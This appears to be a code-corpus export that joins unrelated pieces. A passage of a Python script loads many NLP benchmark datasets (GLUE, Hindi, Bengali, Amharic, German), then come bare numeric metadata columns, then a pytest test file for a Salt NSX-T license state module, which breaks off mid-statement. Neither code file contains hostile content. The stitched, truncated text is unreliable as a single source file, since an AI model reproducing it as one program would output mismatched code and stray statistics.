        dev_LM_dataset = STS_BLMDataset(STS_B_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = STS_BAuxDataset('../data/glue_data/STS-B/dev/', data_frame=STS_B_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = STS_BAuxDataset('../data/glue_data/STS-B/dev/', data_frame=STS_B_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'MRPC'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        MRPC_train_data_frame = utils.get_MRPC_data_frame(config.MRPC_train_data_path)
        train_LM_dataset = MRPCLMDataset(MRPC_train_data_frame, tokenizer)
        train_dataset_aux_1 = MRPCAuxDataset(root='../data/glue_data/MRPC/train/', data_frame=MRPC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = MRPCAuxDataset(root='../data/glue_data/MRPC/train/', data_frame=MRPC_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        MRPC_dev_data_frame = utils.get_MRPC_data_frame(config.MRPC_dev_data_path)
        dev_LM_dataset = MRPCLMDataset(MRPC_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = MRPCAuxDataset(root='../data/glue_data/MRPC/dev/', data_frame=MRPC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = MRPCAuxDataset(root='../data/glue_data/MRPC/dev/', data_frame=MRPC_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'SST_2'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        SST_2_train_data_frame = utils.get_SST_2_data_frame(config.SST_2_train_data_path)
        train_LM_dataset = SST_2LMDataset(SST_2_train_data_frame, tokenizer)
        train_dataset_aux_1 = SST_2AuxDataset(root='../data/glue_data/SST-2/train/', data_frame=SST_2_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        SST_2_dev_data_frame = utils.get_SST_2_data_frame(config.SST_2_dev_data_path)
        dev_LM_dataset = SST_2LMDataset(SST_2_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = SST_2AuxDataset(root='../data/glue_data/SST-2/dev/', data_frame=SST_2_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'CoLA'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        CoLA_train_data_frame = utils.get_CoLA_data_frame(config.CoLA_train_data_path)
        train_LM_dataset = CoLA_LMDataset(CoLA_train_data_frame, tokenizer)
        train_dataset_aux_1 = CoLAAuxDataset(root='../data/glue_data/CoLA/train/', data_frame=CoLA_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        CoLA_dev_data_frame = utils.get_CoLA_data_frame(config.CoLA_dev_data_path)
        dev_LM_dataset = CoLA_LMDataset(CoLA_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = CoLAAuxDataset(root='../data/glue_data/CoLA/dev/', data_frame=CoLA_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'wnli_translated'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        WNLI_translated_train_data_frame = utils.get_WNLI_translated_data_frame(config.WNLI_translated_train_data_path)
        train_LM_dataset = WNLI_TranslatedLMDataset(WNLI_translated_train_data_frame, tokenizer)
        train_dataset_aux_1 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/train/', data_frame=WNLI_translated_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/train/', data_frame=WNLI_translated_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        WNLI_translated_dev_data_frame = utils.get_WNLI_translated_data_frame(config.WNLI_translated_dev_data_path)
        dev_LM_dataset = WNLI_TranslatedLMDataset(WNLI_translated_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/dev/', data_frame=WNLI_translated_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/dev/', data_frame=WNLI_translated_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'iitp_product'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        IITP_product_reviews_train_data_frame = utils.get_IITP_product_reviews_data_frame(config.IITP_product_reviews_train_data_path)
        train_LM_dataset = IITP_Product_ReviewsLMDataset(IITP_product_reviews_train_data_frame, tokenizer)
        train_dataset_aux_1 = IITP_Product_ReviewsAuxDataset(root='../data/iitp-product-reviews/hi/train/', data_frame=IITP_product_reviews_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        IITP_product_reviews_dev_data_frame = utils.get_IITP_product_reviews_data_frame(config.IITP_product_reviews_dev_data_path)
        dev_LM_dataset = IITP_Product_ReviewsLMDataset(IITP_product_reviews_dev_data_frame, tokenizer)
        # NOTE(review): dev data cached under .../test/ — looks intentional
        # (dataset ships without a dev split?) but worth confirming.
        dev_dataset_aux_1 = IITP_Product_ReviewsAuxDataset(root='../data/iitp-product-reviews/hi/test/', data_frame=IITP_product_reviews_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'midas_discourse'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        MIDAS_discourse_train_json = utils.get_MIDAS_discourse_json(config.MIDAS_discourse_train_json_path)
        train_LM_dataset = MIDAS_DiscourseLMDataset(MIDAS_discourse_train_json, tokenizer)
        train_dataset_aux_1 = MIDAS_DiscourseAuxDataset(root='../data/midas-discourse/hi/train/', json_data=MIDAS_discourse_train_json, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        MIDAS_discourse_dev_json = utils.get_MIDAS_discourse_json(config.MIDAS_discourse_dev_json_path)
        dev_LM_dataset = MIDAS_DiscourseLMDataset(MIDAS_discourse_dev_json, tokenizer)
        dev_dataset_aux_1 = MIDAS_DiscourseAuxDataset(root='../data/midas-discourse/hi/test/', json_data=MIDAS_discourse_dev_json, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'dpil_subtask_1'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        DPIL_subtask_1_train_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_1_train_path)
        train_LM_dataset = DPIL_Subtask_1LMDataset(DPIL_subtask_1_train_data_frame, tokenizer)
        train_dataset_aux_1 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/train/', data_frame=DPIL_subtask_1_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/train/', data_frame=DPIL_subtask_1_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        DPIL_subtask_1_dev_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_1_dev_path)
        dev_LM_dataset = DPIL_Subtask_1LMDataset(DPIL_subtask_1_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/test/', data_frame=DPIL_subtask_1_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/test/', data_frame=DPIL_subtask_1_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'dpil_subtask_2'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        DPIL_subtask_2_train_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_2_train_path)
        train_LM_dataset = DPIL_Subtask_2LMDataset(DPIL_subtask_2_train_data_frame, tokenizer)
        train_dataset_aux_1 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/train/', data_frame=DPIL_subtask_2_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/train/', data_frame=DPIL_subtask_2_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        DPIL_subtask_2_dev_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_2_dev_path)
        dev_LM_dataset = DPIL_Subtask_2LMDataset(DPIL_subtask_2_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/test/', data_frame=DPIL_subtask_2_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/test/', data_frame=DPIL_subtask_2_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'KhondokerIslam_bengali'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        KhondokerIslam_bengali_train_data_frame = utils.get_KhondokerIslam_bengali_data_frame(config.KhondokerIslam_bengali_train_path)
        train_LM_dataset = KhondokerIslam_BengaliLMDataset(KhondokerIslam_bengali_train_data_frame, tokenizer)
        train_dataset_aux_1 = KhondokerIslam_BengaliAuxDataset(root='../data/KhondokerIslam_Bengali_Sentiment/train/', data_frame=KhondokerIslam_bengali_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        KhondokerIslam_bengali_dev_data_frame = utils.get_KhondokerIslam_bengali_data_frame(config.KhondokerIslam_bengali_dev_path)
        dev_LM_dataset = KhondokerIslam_BengaliLMDataset(KhondokerIslam_bengali_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = KhondokerIslam_BengaliAuxDataset(root='../data/KhondokerIslam_Bengali_Sentiment/test/', data_frame=KhondokerIslam_bengali_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'rezacsedu_sentiment'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        rezacsedu_sentiment_train_data_frame = utils.get_rezacsedu_sentiment_data_frame(config.rezacsedu_sentiment_train_path)
        train_LM_dataset = Rezacsedu_SentimentLMDataset(rezacsedu_sentiment_train_data_frame, tokenizer)
        train_dataset_aux_1 = Rezacsedu_SentimentAuxDataset(root='../data/rezacsedu_sentiment/train/', data_frame=rezacsedu_sentiment_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        rezacsedu_sentiment_dev_data_frame = utils.get_rezacsedu_sentiment_data_frame(config.rezacsedu_sentiment_test_path)
        dev_LM_dataset = Rezacsedu_SentimentLMDataset(rezacsedu_sentiment_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = Rezacsedu_SentimentAuxDataset(root='../data/rezacsedu_sentiment/test/', data_frame=rezacsedu_sentiment_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'BEmoC'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        BEmoC_train_data_frame = utils.get_BEmoC_data_frame(config.BEmoC_train_path)
        train_LM_dataset = BEmoCLMDataset(BEmoC_train_data_frame, tokenizer)
        # NOTE(review): class name BEmoCLMDatasetAuxDataset looks like a
        # copy-paste artifact (LMDataset + AuxDataset fused) — confirm it is
        # the intended aux-dataset class.
        train_dataset_aux_1 = BEmoCLMDatasetAuxDataset(root='../data/BEmoC/train/', data_frame=BEmoC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        BEmoC_dev_data_frame = utils.get_BEmoC_data_frame(config.BEmoC_dev_path)
        dev_LM_dataset = BEmoCLMDataset(BEmoC_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = BEmoCLMDatasetAuxDataset(root='../data/BEmoC/test/', data_frame=BEmoC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'seid_amharic_sentiment'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        Seid_amharic_train_data_frame = utils.get_Seid_amharic_sentiment_data_frame(config.Seid_Amharic_Sentiment_train_path)
        train_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_train_data_frame, tokenizer)
        train_dataset_aux_1 = Seid_Amharic_SentimentAuxDataset(root='../data/seid_amharic_sentiment/train/', data_frame=Seid_amharic_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        Seid_amharic_dev_data_frame = utils.get_Seid_amharic_sentiment_data_frame(config.Seid_Amharic_Sentiment_dev_path)
        dev_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = Seid_Amharic_SentimentAuxDataset(root='../data/seid_amharic_sentiment/test/', data_frame=Seid_amharic_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'seid_amharic_cleaned_sentiment'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        Seid_amharic_train_data_frame = utils.get_Seid_amharic_sentiment_cleaned_data_frame(config.Seid_Amharic_Sentiment_train_path)
        train_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_train_data_frame, tokenizer)
        train_dataset_aux_1 = Seid_Amharic_Cleaned_SentimentAuxDataset(root='../data/seid_amharic_sentiment/train/', data_frame=Seid_amharic_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        Seid_amharic_dev_data_frame = utils.get_Seid_amharic_sentiment_cleaned_data_frame(config.Seid_Amharic_Sentiment_dev_path)
        dev_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = Seid_Amharic_Cleaned_SentimentAuxDataset(root='../data/seid_amharic_sentiment/test/', data_frame=Seid_amharic_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'germeval2018_subtask_1'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        germeval2018_subtask_train_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_train_path)
        train_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_train_data_frame, tokenizer)
        train_dataset_aux_1 = Germeval2018_Subtask_1AuxDataset(root='../data/germeval2018/train/', data_frame=germeval2018_subtask_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        germeval2018_subtask_dev_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_dev_path)
        dev_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = Germeval2018_Subtask_1AuxDataset(root='../data/germeval2018/test/', data_frame=germeval2018_subtask_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    elif(config.experiment == 'germeval2018_subtask_2'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
        germeval2018_subtask_train_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_train_path)
        train_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_train_data_frame, tokenizer)
        train_dataset_aux_1 = Germeval2018_Subtask_2AuxDataset(root='../data/germeval2018/train/', data_frame=germeval2018_subtask_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = None
        germeval2018_subtask_dev_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_dev_path)
        dev_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = Germeval2018_Subtask_2AuxDataset(root='../data/germeval2018/test/', data_frame=germeval2018_subtask_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = None
    else:
        # Previously an unrecognized experiment name fell through the chain and
        # crashed later with a NameError on train_LM_dataset; fail fast instead.
        raise ValueError(f'Unknown config.experiment: {config.experiment}')
    train_loader = _build_loader_and_show_batch(train_LM_dataset, train_dataset_aux_1, train_dataset_aux_2)
    dev_loader = _build_loader_and_show_batch(dev_LM_dataset, dev_dataset_aux_1, dev_dataset_aux_2)
| 47.698516
| 201
| 0.681071
| 11,207
| 80,372
| 4.515303
| 0.020523
| 0.074343
| 0.043416
| 0.025967
| 0.947454
| 0.933462
| 0.91214
| 0.905678
| 0.888524
| 0.869553
| 0
| 0.014806
| 0.215983
| 80,372
| 1,684
| 202
| 47.726841
| 0.78825
| 0
| 0
| 0.762186
| 0
| 0
| 0.097596
| 0.023491
| 0
| 0
| 0
| 0
| 0.025849
| 1
| 0.133678
| false
| 0
| 0.007386
| 0.049483
| 0.265879
| 0.045052
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6c57c123c8c6ebb5b4879fa91088313f6cf1b76
| 17,859
|
py
|
Python
|
tests/unit/states/test_nsxt_license.py
|
kdsalvy/salt-ext-modules-vmware-1
|
9fdc941692e4c526f575f33b2ce23c1470582934
|
[
"Apache-2.0"
] | 10
|
2021-11-02T20:24:44.000Z
|
2022-03-11T05:54:27.000Z
|
tests/unit/states/test_nsxt_license.py
|
cmcmarrow/salt-ext-modules-vmware
|
c546a9f9ae121b7399dabae82f714117d0ab558d
|
[
"Apache-2.0"
] | 83
|
2021-10-01T15:13:02.000Z
|
2022-03-31T16:22:40.000Z
|
tests/unit/states/test_nsxt_license.py
|
cmcmarrow/salt-ext-modules-vmware
|
c546a9f9ae121b7399dabae82f714117d0ab558d
|
[
"Apache-2.0"
] | 15
|
2021-09-30T23:17:27.000Z
|
2022-03-23T06:54:22.000Z
|
from unittest.mock import MagicMock
from unittest.mock import patch
import pytest
import saltext.vmware.states.nsxt_license as nsxt_license
@pytest.fixture
def configure_loader_modules():
    """Register the nsxt_license state module with an empty loader config."""
    loader_setup = {nsxt_license: {}}
    return loader_setup
def test_present_test_mode():
"""
Test to create license on NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
with patch.dict(nsxt_license.__opts__, {"test": True}):
ret["comment"] = "License would be added to NSX-T Manager"
assert (
nsxt_license.present(
"create-license", "hostname", "admin", "password", "license_key"
)
== ret
)
def test_present_license_already_exists():
"""
Test to create license on NSX-T Manager when license already exists
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = True
ret["comment"] = "License key is already present"
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_create_new_license():
"""
Test to create license on NSX-T Manager when license is not present already
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data_after_apply = {
"result_count": 2,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
},
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
},
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_apply])
apply_license_data = {
"capacity_type": "CPU",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = True
ret["comment"] = "License added successfully"
ret["changes"]["old"] = get_licenses_data
ret["changes"]["new"] = get_licenses_data_after_apply
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_get_licenses_error():
"""
Test to create license on NSX-T Manager when there's an error while fetching existing licenses
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = False
ret["comment"] = (
"Failed to get current licenses from NSX-T Manager :"
" Error occurred while retrieving the license. Please check logs for more details."
)
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_apply_license_error():
"""
Test to create license when there is an error while applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data])
apply_license_data = {
"error": "Error occurred while applying the license. Please check logs for more details."
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to apply license to NSX-T Manager :"
" Error occurred while applying the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_get_license_error_after_apply():
"""
Test to create license when there's an error while retrieving the licenses after applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data_after_apply = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_apply])
apply_license_data = {
"capacity_type": "CPU",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to retrieve licenses after applying current license from NSX-T Manager : "
"Error occurred while retrieving the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_test_mode():
"""
Test to remove license on NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
with patch.dict(nsxt_license.__opts__, {"test": True}):
ret["comment"] = "License would be removed from NSX-T Manager"
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_license_does_not_exists():
"""
Test to remove license from NSX-T Manager when license doesn't exist
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = True
ret["comment"] = "License key is not present in NSX-T Manager"
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "different-key")
== ret
)
def test_absent_delete_existing_license():
"""
Test to delete existing license from NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data_after_delete = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data = {
"result_count": 2,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
},
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
},
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_delete])
delete_license_data = {"message": "License deleted successfully"}
mock_delete_license = MagicMock(return_value=delete_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.delete_license": mock_delete_license,
},
):
ret["result"] = True
ret["comment"] = "License removed successfully"
ret["changes"]["old"] = get_licenses_data
ret["changes"]["new"] = get_licenses_data_after_delete
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_get_licenses_error():
"""
Test to create license on NSX-T Manager when there's an error while fetching existing licenses
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = False
ret["comment"] = (
"Failed to get current licenses from NSX-T Manager :"
" Error occurred while retrieving the license. Please check logs for more details."
)
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_apply_license_error():
"""
Test to create license when there is an error while applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data])
delete_license_data = {
"error": "Error occurred while deleting the license. Please check logs for more details."
}
mock_delete_license = MagicMock(return_value=delete_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.delete_license": mock_delete_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to delete license from NSX-T Manager :"
" Error occurred while deleting the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_get_license_error_after_delete():
    """
    Test to remove license when there's an error while retrieving the licenses after deleting existing license
    """
    # notice the license_key value in data, it is different from what is being passed
    existing_licenses = {
        "result_count": 1,
        "results": [
            {
                "capacity_type": "USER",
                "description": "NSX Data Center Enterprise Plus",
                "expiry": 0,
                "is_eval": False,
                "is_expired": False,
                "license_key": "dummy-key",
                "quantity": 0,
            }
        ],
    }
    retrieval_error = {
        "error": "Error occurred while retrieving the license. Please check logs for more details."
    }
    expected = {
        "name": "delete-license",
        "result": False,
        "comment": (
            "Failed to retrieve licenses after deleting current license from NSX-T Manager : "
            "Error occurred while retrieving the license. Please check logs for more details."
        ),
        "changes": {},
    }
    # First get succeeds, delete succeeds, second get (post-delete check) errors out.
    salt_mocks = {
        "nsxt_license.get_licenses": MagicMock(
            side_effect=[existing_licenses, retrieval_error]
        ),
        "nsxt_license.delete_license": MagicMock(
            return_value={"message": "License deleted successfully"}
        ),
    }
    with patch.dict(nsxt_license.__salt__, salt_mocks), patch.dict(
        nsxt_license.__opts__, {"test": False}
    ):
        result = nsxt_license.absent(
